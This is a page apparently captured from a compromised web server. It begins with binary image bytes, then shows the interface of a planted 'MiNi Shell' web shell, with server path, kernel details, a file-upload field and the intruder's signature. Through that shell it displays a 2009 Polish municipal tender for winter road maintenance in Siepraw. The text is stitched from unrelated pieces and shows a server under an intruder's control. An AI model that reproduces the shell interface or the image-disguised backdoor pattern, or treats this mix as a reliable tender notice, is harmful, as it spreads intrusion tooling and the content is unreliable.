JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091008/173007-N-2009.html

<p class="kh_header"><b>Siepraw: Zimowe utrzymanie dróg - odśnieżanie i usuwanie gołoledzi na drogach powiatowych i gminnych w Gminie Siepraw 2009/2010r.</b><br>
<b>Numer ogłoszenia: 173007 - 2009; data zamieszczenia: 08.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , Siepraw 1, 32-447 Siepraw, woj. małopolskie, tel. 012 2746299, faks 012 3721806.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siepraw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg - odśnieżanie i usuwanie gołoledzi na drogach powiatowych i gminnych w Gminie Siepraw 2009/2010r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usług zimowego utrzymania dróg powiatowych i gminnych na terenie Gminy Siepraw, w tym usług zwalczania gołoledzi i odśnieżania zgodnie z wymogami technicznymi określonymi w załączniku Nr 7 SIWZ i standardem określonym w załączniku Nr 8 do SIWZ.  Zakres zamówienia składa się z dwóch części: Część 1. Drogi powiatowe: 35,03 km,
Część 2. Drogi gminne: 54,98 km. Wykaz dróg, parkingów, placów, na których wykonywane będą usługi oraz kolejność wykonywania usług dotyczących odśnieżania i usuwania śliskości i gołoledzi zawiera załącznik nr 6 do SIWZ. Wykonawca zapewnia materiały do posypywania dróg. Zakres usług jest ściśle uzależniony od warunków atmosferycznych. Zamawiający będzie żądał od Wykonawcy posiadania środków łączności  telefonicznej dla komunikowania się pracownika Urzędu Gminy z kierowcami pracującymi w terenie i pełniącymi dyżur.
Zaleca się aby Wykonawca dokonał wizji lokalnej terenu celem uzyskania wszelkich danych dotyczących stanu technicznego i szerokości dróg, które mogą być niezbędne w przygotowaniu oferty i podpisania umowy na wykonanie usług związanych z zimowym utrzymaniem dróg w Gminie Siepraw.
Wykonawca ponosi pełną odpowiedzialność za szkody (wypadki, kolizje drogowe) spowodowane zaniechaniem prac lub na skutek niedostatecznego, niezgodnego z obowiązującymi przepisami i warunkami podanymi w specyfikacji wykonywanie usług przy zimowym utrzymaniu dróg..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości: Cześć I: 4000 zł (słownie; cztery tysiące złotych), Część II: 4000 zł (słownie; cztery tysiące złotych)  
 do dnia 15.10.2009r., do godz. 1100. W zależności od woli Wykonawcy wadium może być wnoszone w jednej lub kilku z następujących form:
a.pieniądzu,
b.poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c.gwarancjach bankowych,
d.gwarancjach ubezpieczeniowych,
e.poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9.11.2000r., o utworzeniu PARP (Dz. U. Nr 109 poz. 1158 z późn. zm.).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. POSIADAJĄ UPRAWNIENIA DO WYKONANIA OKREŚLONEJ DZIAŁALNOŚCI LUB CZYNNOŚCI, JEŻELI USTAWY NAKŁADAJĄ OBOWIĄZEK POSIADANIA TAKICH UPRAWNIEŃ, tj.(dla części I i II):

- posiadają aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej,

2. POSIADAJĄ NIEZBĘDNĄ WIEDZĘ I DOŚWIADCZENIE ORAZ DYSPONUJĄ POTENCJAŁEM TECHNICZNYM I OSOBAMI ZDOLNYMI DO WYKONANIA ZAMÓWIENIA, tj.:

Część I:
a) dysponują potencjałem technicznym do prawidłowej realizacji zamówienia, co najmniej 3 pługo-piaskarki do odśnieżania dróg, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnego potencjału technicznego. Zgodnie z art. 22 ust. 1 pkt 2 ustawy Wykonawca może przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego do wykonania zamówienia.
b) posiadają niezbędną wiedzę i doświadczenie, tzn. w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali minimum jedno zamówienie odpowiadające swoim rodzajem i wartościom przedmiotowi Zamówienia, tj. udokumentuje, że przez co najmniej jeden sezon zimowy (od listopada do marca) wykonywał prace związane z zimowym utrzymaniem 25 km dróg publicznych minimum powiatowych. Wykazane zamówienie musi być poparte dokumentami potwierdzającymi, że zostało wykonane z należytą starannością wraz z opisem, podaniem jego zakresu, wartości, oraz daty i miejsca wykonania (potwierdzeniem są m.in. referencje, protokół odbioru).
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ww. warunki.


Część II:
a) dysponują potencjałem technicznym do prawidłowej realizacji zamówienia, co najmniej:
- 2 pługo-piaskarki do odśnieżania dróg (min. 1 samochód ciężarowy wyposażony w pług odśnieżny + posyp),
- 2 piaskarki do zwalczania gołoledzi,
- 1 koparko spycharka,
- ładowacz lub inny podobny sprzęt mechaniczny do załadowania mieszanki - 1 szt,
- w razie wystąpienia obfitych opadów śniegu (zawieje, zamiecie śnieżne) możliwość  użycia sprzętu ciężkiego np. ciągnik gąsienicowy DT, koparko-spycharka,
lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnego potencjału technicznego. Zgodnie z art. 22 ust. 1 pkt 2 ustawy Wykonawca może przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego do wykonania zamówienia.
b) posiadają niezbędną wiedzę i doświadczenie, tzn. w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali minimum jedno zamówienie odpowiadające swoim rodzajem i wartościom przedmiotowi Zamówienia, tj. udokumentuje, że przez co najmniej jeden sezon zimowy (od listopada do marca) wykonywał prace związane z zimowym utrzymaniem 25 km dróg publicznych minimum gminnych. Wykazane zamówienie musi być poparte dokumentami potwierdzającymi, że zostało wykonane z należytą starannością wraz z opisem, podaniem jego zakresu, wartości, oraz daty i miejsca wykonania (potwierdzeniem są m.in. referencje, protokół odbioru).
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ww. warunki.

3. ZNAJDUJĄ SIĘ W SYTUACJI EKONOMICZNEJ I FINANSOWEJ ZAPEWNIAJĄCEJ WYKONANIE ZAMÓWIENIA, tj. (dla części I i II):
- posiadają polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.

4. NIE PODLEGAJĄ WYKLUCZENIU Z POSTĘPOWANIA O UDZIELENIE ZAMÓWIENIA, tj. (dla części I i II):
- posiadają aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy Prawo Zamówień Publicznych.
Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - nie spełnia w oparciu o dokumenty załączone do oferty, a których wykaz zawiera punkt 9 do SIWZ. Dokumenty dołączone do oferty winny być podpisane przez osobę (osoby) upoważnioną (upoważnione) do reprezentowania Wykonawcy na zewnątrz. Upoważnienie do podpisania oferty powinno być dołączone do oferty, o ile nie wynika bezpośrednio z innych dokumentów załączonych do oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> CZĘŚĆ I:

1. Dla warunków określonych w pkt. 8.1 ppkt. 1 - 4 wykonawca zobowiązany jest dołączyć oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z wykorzystaniem wzoru - załącznik nr 2 do SIWZ
Wymagana forma - oryginał.
W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców, należy złożyć wspólne oświadczenie podpisane przez każdego z tych Wykonawców lub przez Pełnomocnika upoważnionego do reprezentowania ich w postępowaniu, lub reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

2. W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonania określonej działalności lub czynności zamawiający żąda od wykonawców dołączenia do oferty następujących dokumentów:
2.1. Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Z dokumentu powinno wynikać, kto jest upoważniony do podpisywania ofert (zaciągania zobowiązań).
Wymagana forma - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.

3. W celu potwierdzenia posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda dołączenia do oferty następujących dokumentów:
3.1. Wykazu niezbędnego do wykonania zamówienia sprzętu, którym dysponuje lub będzie dysponował wykonawca zgodnie z warunkiem określonym w punkcie 8.1 ppkt. 2a SIWZ dla części I, zgodnie z załącznikiem nr 3 do SIWZ. 
Wymagana forma - oryginał.
3.1.1. Pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnego do wykonania zamówienia sprzętu, jeżeli w wykazie, o którym mowa w pkt. 3.1 (załącznik nr 3 do siwz) wykonawca wskazał sprzęt, którym będzie dysponował.
Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.
3.2. Wykazu wykonywanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowanych zamówień zimowego utrzymania dróg zgodnie z warunkiem określonym w punkcie 8.1 ppkt. 2b SIWZ dla części I, zgodnie z załącznikiem nr 4 do SIWZ.
Wymagana forma - oryginał.
3.2.1.Wykazane zamówienia muszą być poparte dokumentami potwierdzającymi, że zostały wykonane z należytą starannością wraz z opisem, podaniem ich zakresu, wartości, oraz daty i miejsca wykonania.
Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.

4. W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda od wykonawców dołączenia do oferty następujących dokumentów:
4.1. Polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.

5. W celu potwierdzenia, że wykonawca nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r.- Prawo zamówień publicznych, zwanej dalej ustawą, zamawiający żąda od wykonawców dołączenia do oferty następujących dokumentów:
5.1. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy Prawo Zamówień Publicznych wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich łączny potencjał techniczny. W tym celu dokumenty określone w pkt. 3.1 ÷ 3.2 ma obowiązek złożyć ten lub ci z wykonawców, którzy w imieniu wszystkich Wykonawców będą spełniać warunki udziału określone w punkcie 8.1. ppkt  2 SIWZ dla części I.

CZĘŚĆ II:

1. Dla warunków określonych w pkt. 8.1 ppkt. 1 - 4 wykonawca zobowiązany jest dołączyć oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z wykorzystaniem wzoru - załącznik nr 2 do SIWZ
Wymagana forma - oryginał.
W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców, należy złożyć wspólne oświadczenie podpisane przez każdego z tych Wykonawców lub przez Pełnomocnika upoważnionego do reprezentowania ich w postępowaniu, lub reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

2. W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonania określonej działalności lub czynności zamawiający żąda od wykonawców dołączenia do oferty następujących dokumentów:
2.1. Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Z dokumentu powinno wynikać, kto jest upoważniony do podpisywania ofert (zaciągania zobowiązań).
Wymagana forma - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.

3. W celu potwierdzenia posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda dołączenia do oferty następujących dokumentów:
3.1. Wykazu niezbędnego do wykonania zamówienia sprzętu, którym dysponuje lub będzie dysponował wykonawca zgodnie z warunkiem określonym w punkcie 8.1 ppkt. 2a SIWZ dla części II, zgodnie z załącznikiem nr 3 do SIWZ. 
Wymagana forma - oryginał.
3.1.1. Pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnego do wykonania zamówienia sprzętu, jeżeli w wykazie, o którym mowa w pkt. 3.1 (załącznik nr 3 do siwz) wykonawca wskazał sprzęt, którym będzie dysponował.
Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.
3.2. Wykazu wykonywanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowanych zamówień zimowego utrzymania dróg zgodnie z warunkiem określonym w punkcie 8.1 ppkt. 2b SIWZ dla części II, zgodnie z załącznikiem nr 4 do SIWZ.
Wymagana forma - oryginał.
3.2.1.Wykazane zamówienia muszą być poparte dokumentami potwierdzającymi, że zostały wykonane z należytą starannością wraz z opisem, podaniem ich zakresu, wartości, oraz daty i miejsca wykonania.
Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.

4. W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda od wykonawców dołączenia do oferty następujących dokumentów:
4.1. Polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.

5. W celu potwierdzenia, że wykonawca nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r.- Prawo zamówień publicznych, zwanej dalej ustawą, zamawiający żąda od wykonawców dołączenia do oferty następujących dokumentów:
5.1. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy Prawo Zamówień Publicznych wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich łączny potencjał techniczny. W tym celu dokumenty określone w pkt. 3.1 ÷ 3.2 ma obowiązek złożyć ten lub ci z wykonawców, którzy w imieniu wszystkich Wykonawców będą spełniać warunki udziału określone w punkcie 8.1. ppkt  2 SIWZ dla części II.

CZĘŚĆ I i II:
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w przypadku konsorcjum) winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Do oferty należy dołączyć pełnomocnictwo do reprezentowania wszystkich wykonawców w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2. Jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego pełnomocnika do przedstawienia umowy regulującej współpracę tych wykonawców.
Wymagana forma - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę
3. Wszelka korespondencja, oświadczenia, wnioski adresowane będą do Pełnomocnika ze skutkiem wobec wszystkich Wykonawców. 
4. Wykonawcy wspólnie ubiegający się o zamówienie:
1) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia,
2)  zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez partnera kierującego lub od wszystkich partnerów łącznie lub od każdego z osobna, albo też w inny sposób ustalony w umowie konsorcjum,
3)  zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przyjmuje się że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich dokumentów.
Podwykonawcy.
5. W przypadku realizacji zamówienia przy współudziale podwykonawców Wykonawca musi   załączyć do oferty szczegółowy   wykaz   zakresu   robót,   których   wykonanie Wykonawca   zamierza   powierzyć podwykonawcom zgodnie ze wzorem stanowiącym załącznik nr 9 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.siepraw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Siepraw 32-447 Siepraw 1 pokój nr 28, fax 012 3721806.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2009 godzina 11:00, miejsce: Urząd Gminy Siepraw 32-447 Siepraw 1 pokój nr 28.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zimowe utrzymanie dróg - odśnieżanie i usuwanie gołoledzi na drogach powiatowych i gminnych w Gminie Siepraw 2009/2010r..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usług zimowego utrzymania dróg powiatowych dł. 35,03 km na terenie Gminy Siepraw..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zimowe utrzymanie dróg - odśnieżanie i usuwanie gołoledzi na drogach powiatowych i gminnych w Gminie Siepraw 2009/2010r.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usług zimowego utrzymania dróg gminnych dł. 54,98 km na terenie Gminy Siepraw..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com